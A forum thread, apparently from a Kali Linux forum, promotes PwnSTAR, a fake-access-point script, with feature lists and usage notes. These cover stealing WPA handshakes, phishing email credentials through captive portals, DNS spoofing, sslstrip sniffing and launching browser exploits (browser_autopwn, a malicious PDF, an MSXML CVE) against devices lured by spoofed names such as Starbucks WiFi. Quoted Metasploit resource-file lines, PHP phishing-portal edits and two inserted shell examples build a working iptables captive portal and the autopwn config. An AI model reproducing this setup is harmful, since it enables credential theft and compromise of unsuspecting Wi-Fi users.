
Thread: PwnSTAR running on Kali

  1. #1 Vulpi (Member; joined Mar 2013; location: Totally lost; 45 posts)

    PwnSTAR running on Kali

    PwnSTAR (Pwn SofT Ap scRipt) now runs on Kali.

    https://github.com/SilverFoxx/PwnSTAR

    Features
    takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
    steals WPA handshakes
    phishes email credentials
    serves webpages: supplied (eg hotspot, below) or provide your own
    sniffing with ferret and sslstrip
    adds a captive portal to the frontend of the fake AP
    assorted exploits
    de-auth with MDK3, aireplay-ng or airdrop-ng

    Use your imagination, craft your own webpages, and have fun.

    Vulpi

    Last edited by Vulpi; 04-19-2014 at 07:03 AM.

  2. #2 Vulpi (Member; joined Mar 2013; location: Totally lost; 45 posts)
    The README has some ideas on how to use it.
    Code:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       Basic Menu
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc
                     no internet access given

        2) Grab WPA handshake

        3) Sniffing: provide internet access, then be MITM

        4) Simple web server with dnsspoof: redirect the victim to your webpage

        5) Karmetasploit

        6) Browser_autopwn

    1) Relies on auto-connections, i.e. the device connects without the owner being aware. You can then attempt to exploit it.
    Target the fake-AP ESSID to something the device has likely connected to previously, e.g. Starbucks WiFi.

    2) Sometimes it is easier to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DoS the target.
    Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.

    3) Provides an open network, so you can sniff the victim's activities.

    4) Uses apache to serve a webpage. There is an option to load your own page, e.g. one you have cloned. The provided page (hotspot_3) asks for email details.
    Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof.
    DNS caching in the client is a problem with this technique. The captive portal in the advanced menu is a better way of hosting hotspot_3.

    5&6) Provides all the arduous config files to properly set up these attacks.


    Browser_autopwn gaining shells against Windows Vista: [screenshot]

    Code:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       Advanced Menu
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
        a) Captive portals (phish/sniff)
        
        b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)
    
        c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
        
        d) Java_jre17_jmxbean
        
        e) Choose another browser exploit

    a) Uses iptables rules to route the clients. Is essentially a fully functioning captive portal.
    Avoids the problems of spoofing.

    1) Serves hotspot_3. Allows clients onto the internet once credentials are given.

    2) Allows you to add a personal header to the index.php.
    You could probably copy the php functions from this page onto a cloned page and load that instead.

    b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet.
    Includes a virgin pdf to which you can add your own payload.

    c&d) Launches a couple of example browser exploits.

    e) Gives a skeleton framework for loading any browser exploit of your choice.
    Edit PwnSTAR's browser_exploit_fn directly for more control.


    Two clients being simultaneously handled by the captive portal: [screenshot]

    Have fun, and READ THE SCRIPT!
    Vulpi
    Last edited by Vulpi; 04-19-2014 at 07:06 AM.
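The iptables-based captive portal that advanced menu option a) describes, as an added example rather than PwnSTAR's own code: unauthenticated clients on the fake AP have their port-80 traffic DNATed to the portal web server and nothing else is forwarded, real DNS answers are let through from the start (so no dnsspoof and no client DNS-cache problem), and once the portal page accepts credentials its back end (the service.php discussed later in the thread would be the caller) runs authorize_client for that client's IP/MAC pair. The interface names at0/eth0, the portal address 10.0.0.1:80 and the DRY_RUN switch are assumptions of this example, not details from the post; with DRY_RUN=1 (the default) the iptables commands are printed for review instead of executed, so it runs without root.

```shell
#!/bin/sh
# Added example, not PwnSTAR's code: a minimal captive-portal gate built from
# iptables rules. Assumed values: AP_IF/INET_IF names, PORTAL_IP:PORTAL_PORT,
# and DRY_RUN (1 = print the commands, 0 = run them; needs root).

AP_IF="${AP_IF:-at0}"            # airbase-ng tap interface (assumed name)
INET_IF="${INET_IF:-eth0}"       # upstream interface with internet (assumed)
PORTAL_IP="${PORTAL_IP:-10.0.0.1}"
PORTAL_PORT="${PORTAL_PORT:-80}"
DRY_RUN="${DRY_RUN:-1}"

# Execute a command, or just print it when DRY_RUN=1.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# Strict syntax checks: these values arrive from a web back end and end up on
# a command line, so never pass them through unvalidated.
valid_mac() {
    printf '%s' "$1" | grep -Eiq '^([0-9a-f]{2}:){5}[0-9a-f]{2}$'
}

valid_ip() {
    ip="$1"
    printf '%s' "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    oldifs="$IFS"; IFS=.
    set -- $ip
    IFS="$oldifs"
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Install the gate. Order matters: the PORTAL and AUTHORIZED chains are
# consulted first, so rules inserted there later bypass the redirect/DROP.
portal_up() {
    run sysctl -w net.ipv4.ip_forward=1
    # nat table: unauthenticated web traffic is steered to the portal
    run iptables -t nat -N PORTAL
    run iptables -t nat -A PREROUTING -i "$AP_IF" -j PORTAL
    run iptables -t nat -A PORTAL -p tcp --dport 80 -j DNAT --to-destination "$PORTAL_IP:$PORTAL_PORT"
    run iptables -t nat -A POSTROUTING -o "$INET_IF" -j MASQUERADE
    # filter table: only authorised clients (and DNS lookups) are forwarded
    run iptables -N AUTHORIZED
    run iptables -A FORWARD -i "$AP_IF" -j AUTHORIZED
    run iptables -A FORWARD -i "$AP_IF" -p udp --dport 53 -j ACCEPT
    run iptables -A FORWARD -i "$AP_IF" -j DROP
    run iptables -A FORWARD -i "$INET_IF" -o "$AP_IF" -m state --state ESTABLISHED,RELATED -j ACCEPT
}

# Whitelist one client: skip the DNAT (RETURN out of PORTAL) and accept its
# forwarded traffic. Matching IP and MAC together makes the hole harder for
# another station to borrow by grabbing the same DHCP lease.
authorize_client() {
    ip="$1"; mac="$2"
    valid_ip "$ip"   || { echo "bad ip: $ip" >&2; return 1; }
    valid_mac "$mac" || { echo "bad mac: $mac" >&2; return 1; }
    run iptables -t nat -I PORTAL 1 -s "$ip" -m mac --mac-source "$mac" -j RETURN
    run iptables -I AUTHORIZED 1 -s "$ip" -m mac --mac-source "$mac" -j ACCEPT
}

# Usage: sh portal.sh up   |   sh portal.sh auth 10.0.0.23 00:11:22:33:44:55
case "${1:-}" in
    up)   portal_up ;;
    auth) authorize_client "$2" "$3" ;;
esac
```

Because only port 80 is redirected, an HTTPS-first client never sees the portal page until it makes a plain-HTTP request (modern OSes do this with a connectivity-check URL); that is the same limitation a real captive portal has.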

  3. #3 charonsecurity (Senior Member; joined Mar 2013; 270 posts)
    Thank you! Love your script
    Fact, Science and the Pursuit of Knowledge. Working to secure your networks from threats; Outside and Within.

  4. #4 sickness (Junior Member; joined Mar 2013; 9 posts)
    I will try that out as soon as I have time to install Kali (first release was bugged for me, keyboard stuff).
    I am reading through the code, and it's very neat.


    Vulpi, I used to do the same as you:
    Code:
    read apusage
    if [[ $apusage = q ]];then
        exit_fn
    elif [[ $apusage != [1-6] && $apusage != 9 ]];then
        first_fn
    elif [[ $apusage = 9 ]];then
        adv_usage_fn
    fi
    But I was hinted to use case in ... esac instead, and it's way better. For instance, instead of this barbarian line: "elif [[ $apusage != [1-6] && $apusage != 9 ]];then first_fn" you would just have to write *) first_fn ;;
    I use some of those in Yamas, you should check it out. It's also quite easy to replace. "edit": I see you use it later on in the script, so you should be all right!

    Code:
    if [[ $var = n ]];then
        internet=
        interface_fn
    fi
    if [[ $var = y ]];then
        if [[ $apusage = 3 || $apusage = a || $apusage = b || $apusage = c ]];then
            echo -e "$warn\nDuh, won't work without an internet interface. Start again"
            sleep 2
            interface_fn
        fi
    fi
    Shouldn't that be one big if with sub ifs, and an elif in case neither y nor n are entered ?

    Code:
    $API is in use, stupid. Try another interface
    Code:
    elif [[ $initial_scan != n ]];then  # any value other than n restarts the function
        echo -e "$warn\nWhat's it gunna be babe...yes or no?"
    ahah, havin' fun are ya, boy?

    Code:
    echo -e "$info\nConsider using yamas or easy-creds to parse logs"
    cheers!

    Code:
    echo "use auxiliary/server/browser_autopwn" > /tmp/karma.rc
    echo "setg AUTOPWN_HOST $ap_ip" >> /tmp/karma.rc
    echo "setg AUTOPWN_PORT 55550" >> /tmp/karma.rc
    echo "setg AUTOPWN_URI /ads" >> /tmp/karma.rc
    echo "set LHOST $ap_ip" >> /tmp/karma.rc
    echo "set LPORT 45000" >> /tmp/karma.rc
    echo "set SRVPORT 55550" >> /tmp/karma.rc
    echo "set URIPATH /ads" >> /tmp/karma.rc
    echo "run" >> /tmp/karma.rc
    
    ---SNIP---
    Why not:
    Code:
    echo -en "setg AUTOPWN_HOST $ap_ip
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads
    set LHOST $ap_ip
    ---SNIP---
    set URIPATH /ads
    run" > /tmp/karma.rc
    since you're always writing to the same file?

    That's all for now! More feedback when I get my hand on it!
    Last edited by sickness; 04-12-2013 at 08:59 PM.
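The three refactors this post argues for, written out as an added example that is neither PwnSTAR's nor Yamas's code: a case/esac dispatcher in place of the if/elif chain (the handler names exit_fn, first_fn and adv_usage_fn are the ones quoted above; basic_fn is a placeholder), a yes/no prompt with an explicit branch for input that is neither y nor n, and one heredoc that writes the whole browser_autopwn resource file in a single redirection, using the settings quoted from the script. The functions return or print their results instead of launching anything, so the logic can be exercised without a wireless card.

```shell
#!/bin/sh
# Added example, not PwnSTAR's or Yamas's code. Handler names other than
# exit_fn/first_fn/adv_usage_fn are placeholders.

# Dispatch one menu keystroke. Prints the handler to call rather than calling
# it, so the decision table is testable on its own.
dispatch() {
    case "$1" in
        q)      echo exit_fn ;;
        [1-6])  echo "basic_fn $1" ;;
        9)      echo adv_usage_fn ;;
        *)      echo first_fn ;;       # anything else: redraw the menu
    esac
}

# Ask a yes/no question and keep asking until the answer is y or n; the
# original pair of ifs had no branch at all for any other input.
ask_yn() {   # $1 = prompt; answers read from stdin; prints y or n
    while :; do
        printf '%s [y/n] ' "$1" >&2
        read -r ans || return 1        # EOF: give up rather than loop forever
        case "$ans" in
            y|Y) echo y; return 0 ;;
            n|N) echo n; return 0 ;;
            *)   echo "yes or no?" >&2 ;;
        esac
    done
}

# Write the browser_autopwn resource file in one go.
# $1 = output path, $2 = AP address. The delimiter is unquoted so $ap_ip
# expands; every other line is literal, exactly as in the echo chain.
write_autopwn_rc() {
    rc="$1"; ap_ip="$2"
    cat > "$rc" <<EOF
use auxiliary/server/browser_autopwn
setg AUTOPWN_HOST $ap_ip
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
set LHOST $ap_ip
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
run
EOF
}

# Usage: sh menu.sh 10.0.0.1 /tmp/karma.rc   (interactive demo)
if [ -n "${1:-}" ]; then
    printf 'Option? ' >&2; read -r opt
    echo "would call: $(dispatch "$opt")"
    [ "$(ask_yn 'Have internet?')" = y ] && write_autopwn_rc "${2:-/tmp/karma.rc}" "$1"
fi
```

Quoting the delimiter (`<<'EOF'`) would turn off expansion for the whole body, which is the usual mistake when moving from echo to a heredoc; here expansion is wanted for `$ap_ip` and nothing else in the body contains a `$`.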

  5. #5 Vulpi (Member; joined Mar 2013; location: Totally lost; 45 posts)
    Quote Originally Posted by charonsecurity: Thank you! Love your script
    Thanks charonsecurity. Let me know if you find any bugs.

  6. #6 Vulpi (Member; joined Mar 2013; location: Totally lost; 45 posts)
    Quote Originally Posted by sickness: I am reading through the code, and it's very neat.
    I should hope so - the first script I ever studied was yamas!

    All your comments are valid. The script started out very small; as it grew I simply added more elifs etc. If I was starting from scratch I would do things differently - but I'm too lazy to re-write it!

    PS It only took me a few minutes to get yamas running on Kali - your fans are waiting

  7. #7 jamyz (Junior Member; joined Apr 2013; 2 posts)
    Hi, it's a great tool....
    But I'm trying to change the portal_simple php. How can I change the default email and password page to password 1 and password 2?
    If password 1 and password 2 are the same it's ok, you are authorized.

  8. #8 Vulpi (Member; joined Mar 2013; location: Totally lost; 45 posts)
    In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):
    PHP Code:
     <tr><td>Email address:</td><td><input type='text' name='email'></td></tr>
    In service.php, this is the line to change:
    PHP Code:
     if(($email == "") || ($password == "")){
    You probably want something like "if $email != $password" etc.
    There are lots of good "learn php in a weekend" tutorials on the net.

  9. #9 jamyz (Junior Member; joined Apr 2013; 2 posts)

    Quote Originally Posted by Vulpi View Post
    In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):
    PHP Code:
     <tr><td>Email address:</td><td><input type='text' name='email'></td></tr>
    In service.php, this is the line to change:
    PHP Code:
     if(($email == "") || ($password == "")){
    You probably want something like "if $email != $password" etc.
    There are lots of good "learn php in a weekend" tutorials on the net.
    I changed your portal_simple to this:
    portal_simpleOK.rar (10 KB)
    https://mega.co.nz/#!fpZFjYQA!ObqAaU...vBk2Oc28zSoVag
    The original is from Technic Dynamic.
    Now if the password is wrong or blank, it shows an error.
    If you can, put this in a named portal like "portal_wpa" in your next release.
    Enjoy.
    Last edited by jamyz; 04-24-2013 at 06:12 AM.

  10. #10 Vulpi (Member; joined Mar 2013; location: Totally lost; 45 posts)
    I can't access the mega download. However, the WPA pages by Deathcorps (http://www.backtrack-linux.org/forum...ad.php?t=47021) do work for me. If you are having problems the first thing I would suggest is to check all the permissions are correct (see script readme).

    This attack doesn't need hardcoding into PwnSTAR. The idea is that you can use the script to launch whatever cloned website you wish (Basic menu option 4 "Simple web server with dnsspoof").
